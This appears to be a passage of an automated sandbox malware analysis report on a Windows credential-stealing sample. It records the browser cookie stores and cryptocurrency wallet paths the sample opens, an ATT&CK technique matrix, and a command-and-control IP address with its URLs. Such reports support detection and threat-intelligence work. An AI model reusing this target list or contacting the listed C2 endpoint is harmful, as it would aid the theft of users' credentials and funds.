                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: Yara matchFile source: Process Memory Space: OlZzqwjrwO.exe PID: 7712, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.3.OlZzqwjrwO.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.OlZzqwjrwO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.OlZzqwjrwO.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.OlZzqwjrwO.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1340247273.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: OlZzqwjrwO.exe PID: 7712, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                    Native API
                    1
                    LSASS Driver
                    1
                    Process Injection
                    32
                    Virtualization/Sandbox Evasion
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    LSASS Driver
                    1
                    Process Injection
                    LSASS Memory471
                    Security Software Discovery
                    Remote Desktop Protocol31
                    Data from Local System
                    1
                    Non-Application Layer Protocol
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    Security Account Manager32
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive11
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Software Packing
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem113
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    OlZzqwjrwO.exe89%ReversingLabsWin32.Trojan.Smokeloader
                    OlZzqwjrwO.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://94.158.244.69/wbBA0%Avira URL Cloudsafe
                    http://94.158.244.69/tFkr0%Avira URL Cloudsafe
                    http://94.158.244.69/nQ0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sock0LfNn/Fbj0%Avira URL Cloudsafe
                    http://94.158.244.69/c2socks~0%Avira URL Cloudsafe
                    http://94.158.244.69/4NaI0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockF0%Avira URL Cloudsafe
                    http://94.158.244.69/c2socks40%Avira URL Cloudsafe
                    http://94.158.244.69/i0%Avira URL Cloudsafe
                    http://94.158.244.69/79Wd0%Avira URL Cloudsafe
                    http://94.158.244.69/PJf0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockS0%Avira URL Cloudsafe
                    http://94.158.244.69/Jihk0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sock&0%Avira URL Cloudsafe
                    http://94.158.244.69/F0%Avira URL Cloudsafe
                    http://94.158.244.69/ZuKk0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s-part-0017.t-0009.t-msedge.net
                    13.107.246.45
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://94.158.244.69/c2sockfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabOlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://94.158.244.69/nQOlZzqwjrwO.exe, 00000000.00000002.3107144031.00000000009E6000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://94.158.244.69/wbBAOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://duckduckgo.com/ac/?q=OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoOlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://94.158.244.69/c2socks~OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://94.158.244.69/4NaIOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://94.158.244.69/c2sockFOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://crl.rootca1.amazontrust.com/rootca1.crl0OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://94.158.244.69/c2socks4OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://upx.sf.netAmcache.hve.8.drfalse
                                    high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://ocsp.rootca1.amazontrust.com0:OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://94.158.244.69/tFkrOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.ecosia.org/newtab/OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://94.158.244.69/79WdOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://94.158.244.69/iOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brOlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://94.158.244.69/c2sock0LfNn/FbjOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ac.ecosia.org/autocomplete?q=OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://94.158.244.69/c2sockSOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://94.158.244.69/PJfOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://x1.c.lencr.org/0OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchOlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000310B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://94.158.244.69/JihkOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://94.158.244.69/c2sock&OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://94.158.244.69/OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.mozilla.org/products/firefoxgro.allOlZzqwjrwO.exe, 00000000.00000002.3115279561.0000000003DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=OlZzqwjrwO.exe, 00000000.00000003.1799502894.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://94.158.244.69/FOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://94.158.244.69/ZuKkOlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            94.158.244.69
                                                            unknownMoldova Republic of
                                                            39798MIVOCLOUDMDtrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1555043
                                                            Start date and time:2024-11-13 10:51:06 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 7m 5s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:10
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:OlZzqwjrwO.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:0f9e80e70619e5bf0a9ef86008d8d90315463f2ca4ca224172aa2d42bae2734e.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@2/5@0/1
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 95%
                                                            • Number of executed functions: 59
                                                            • Number of non-executed functions: 110
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240s for sample files taking high CPU consumption
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.89.179.12
                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: OlZzqwjrwO.exe
                                                            TimeTypeDescription
                                                            04:54:53API Interceptor1x Sleep call for process: WerFault.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            94.158.244.69Vd3tOP5WSD.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69/c2sock
                                                            g1kWKm20Z5.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69/c2sock
                                                            cgln32y2HF.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69/c2sock
                                                            4Oq9i3gm0g.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69/c2sock
                                                            RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69/c2sock
                                                            5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69/c2sock
                                                            dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69/c2sock
                                                            BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69/c2sock
                                                            ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69/c2sock
                                                            IVN6n1kO22.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69/c2sock
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            s-part-0017.t-0009.t-msedge.netMc8s3us2xa.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 13.107.246.45
                                                            https://wmrc.titurimplec.com/HA02SW/Get hashmaliciousUnknownBrowse
                                                            • 13.107.246.45
                                                            https://shorturl.at/gHbMJGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.45
                                                            REQ 2024 xlx.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 13.107.246.45
                                                            58751534976167198.jsGet hashmaliciousStrela DownloaderBrowse
                                                            • 13.107.246.45
                                                            Xeno Executor Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.45
                                                            Xeno Executor Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.45
                                                            http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfuKD2Iz98QeQpE-2BkxRR0H-2BqB5cDKklujIJ5FLru7QrAASOSa17vR-2FSCLVAx4lWyy5Q-3D-3DNnGv_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKUAGjaILaAN0mF43Ydvv3aAXjCPBMrYvHXhqj-2F90M8IWSluK-2FDr0h4-2FIbAXpExZIWOjtRSKBCrpvm-2BHKZd6Q2itOPvvv8Wh8uHJq1rbQgzA92MMGG0eeFCZzQMnosAWydLTI7R4yQPl90fJpGVjewvRcCF77tY5-2B3PAHwq6SU-2Fc2kSK8E1mMumIEdp0dsw2BfptVK6-2FXO4Hh-2FAV8-2FJ5YFUs6qp3oyRx3LiWrBnDVYrVE-3DGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.45
                                                            new.batGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.45
                                                            txt2.batGet hashmaliciousUnknownBrowse
                                                            • 13.107.246.45
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            MIVOCLOUDMDVd3tOP5WSD.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69
                                                            g1kWKm20Z5.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69
                                                            cgln32y2HF.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69
                                                            4Oq9i3gm0g.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69
                                                            RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69
                                                            5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69
                                                            dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69
                                                            BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69
                                                            ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69
                                                            IVN6n1kO22.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 94.158.244.69
                                                            No context
                                                            No context
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.8431093415846114
                                                            Encrypted:false
                                                            SSDEEP:192:/PK5yLt9ce50UhsFO5RQR9jGdzuiF+Z24IO8AXRDX:Hn9EUhsFOajEzuiF+Y4IO8A
                                                            MD5:32910EB66ED416C0584D1091D347E7EF
                                                            SHA1:605E500041379F26456632E38CFB9021EA569CB8
                                                            SHA-256:2B1B52832A7896F371D3AD1BC043B3B2F721B4A719499F2F776324A911E9F151
                                                            SHA-512:E4013C007CC1053C876842AEA7A36BF3B0E8238BC6B34A5E2A9131D58F44DBF4E00383D8E6A7C29C52EC317C39894F9820ED7A419DF7B3C94DA3B49EAC03E525
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.6.5.2.8.8.7.0.9.8.7.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.6.5.2.8.9.0.5.3.6.2.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.7.5.b.c.0.4.-.6.2.4.2.-.4.2.2.6.-.8.3.9.7.-.3.5.3.1.4.8.c.c.3.9.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.a.9.2.5.e.1.-.2.9.8.b.-.4.b.f.e.-.9.f.9.d.-.b.d.b.7.8.2.a.d.a.d.2.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.O.l.Z.z.q.w.j.r.w.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.2.0.-.0.0.0.1.-.0.0.1.4.-.9.f.6.d.-.c.b.a.c.b.1.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.0.7.8.5.3.e.1.2.0.f.6.b.b.e.b.f.c.0.8.0.e.1.6.9.5.7.a.7.b.4.a.0.0.0.0.1.1.4.1.!.0.0.0.0.f.d.4.4.e.2.5.1.a.8.9.8.8.5.5.a.6.c.5.5.e.6.f.b.d.1.e.e.b.b.d.8.0.7.8.9.8.0.5.2.!.O.l.Z.z.q.w.j.r.w.O...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 15 streams, Wed Nov 13 09:54:48 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):41004
                                                            Entropy (8bit):2.491680324721428
                                                            Encrypted:false
                                                            SSDEEP:192:H7rX4+oNN8/OSpLdYF2yMbQAQqZGutXvif+ZNUnaTM3:YnXxSpLdYIuvk/tfq+ZNUaTM3
                                                            MD5:49D7F205C22A6434246A2F2E2E0B0E48
                                                            SHA1:F7A8FDB1CD18E9A5BB676E4B0748347E9B3835F5
                                                            SHA-256:4E7B28E3EC2BC69BC946DA4001AAA28B04CD30FD9E136DD01991510B5BC628DC
                                                            SHA-512:6FE2DD50BCF3F195A505FCDA75C3FBF19893DFB193EBE2E5572564C91587196EA6997BFF22471967DFD3F67D1C353A0CB6DF56D106B228EE44E0AEC49C101792
                                                            Malicious:false
                                                            Reputation:low
